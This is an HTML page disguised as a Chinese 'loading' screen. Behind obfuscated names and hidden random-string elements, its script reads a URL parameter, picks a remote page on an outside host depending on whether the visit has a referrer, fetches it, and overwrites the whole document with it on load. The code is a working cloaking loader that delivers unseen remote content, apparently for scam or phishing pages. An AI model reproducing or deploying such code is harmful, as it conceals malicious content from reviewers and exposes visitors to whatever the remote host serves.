<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .KrWzXhgdWb {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .KrWzXhgdWb .HZkq0W8Ir8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .KrWzXhgdWb .content {
            line-height: 50px;
            text-align: center
        }

        .KrWzXhgdWb .img {
            width: 100%
        }

        .KrWzXhgdWb .J3IVaKc0hr {
            text-align: center
        }

        .KrWzXhgdWb .J3IVaKc0hr span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .KrWzXhgdWb .J3IVaKc0hr span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .KrWzXhgdWb .J3IVaKc0hr span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .KrWzXhgdWb .J3IVaKc0hr span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .KrWzXhgdWb .J3IVaKc0hr span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .KrWzXhgdWb .J3IVaKc0hr span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .KrWzXhgdWb .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function X32qWKDOccf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Knq2VJo = X32qWKDOccf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Knq2VJo +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Knq2VJo +".html?a=share";
		}
		
        sxlJCb=url+"#"+new Date().getTime();
        sxlJCb && function() {
            $.get(sxlJCb, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >a2NQIYVaguzMVBRrG3TNLnjaPc</li>
<b style='display:none' >dcoWVYfN0N1ClZPTyRBPAsQdMHqUJyD0gQK35om</b>
<b style='display:none' >dcoWVYfN0N1ClZPTyRBPAsQdMHqUJyD0gQK35om</b>
<p  style='display:none'>CPFCzXlbgcOC8uwY4IVYQs</p>
<div style='display:none'>ZKBxLuBiUsGRIR6w616mKvP2VrozApnF2wijKUSuPr7JP3eRTK5FIpC3vhhYebcoY</div>
<div style='display:none'>ZKBxLuBiUsGRIR6w616mKvP2VrozApnF2wijKUSuPr7JP3eRTK5FIpC3vhhYebcoY</div>
<span style='display:none'>ZCkF0vNLuA8ksi1NrSFupzpvp8xsX8Dlv9dcIobl6QcFcndFlA</span>
<p  style='display:none'>CPFCzXlbgcOC8uwY4IVYQs</p><div class="KrWzXhgdWb">
    <div class="HZkq0W8Ir8">
        <div class="J3IVaKc0hr">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<ul style='display:none' >Ia3cZbZuHhKItohjfFJNxYzfJxrLiLoZZerOfbvd9HebUYd5bE6h329uQSE2yd5bkurYX</ul>
<a  href='#' style='display:none'>WNg8K9Da6h6gJAxZdriPL2AWE2t3fhPfZPomeRuZZXQD21Cwt10MslePYUz2dc</a>
<b style='display:none' >lA7Iu8BI6Y7CVEIdSq05Pv0CUdQunUua2</b>
<span style='display:none'>MPgbX96pI7ZLo63TC</span></body>
</html>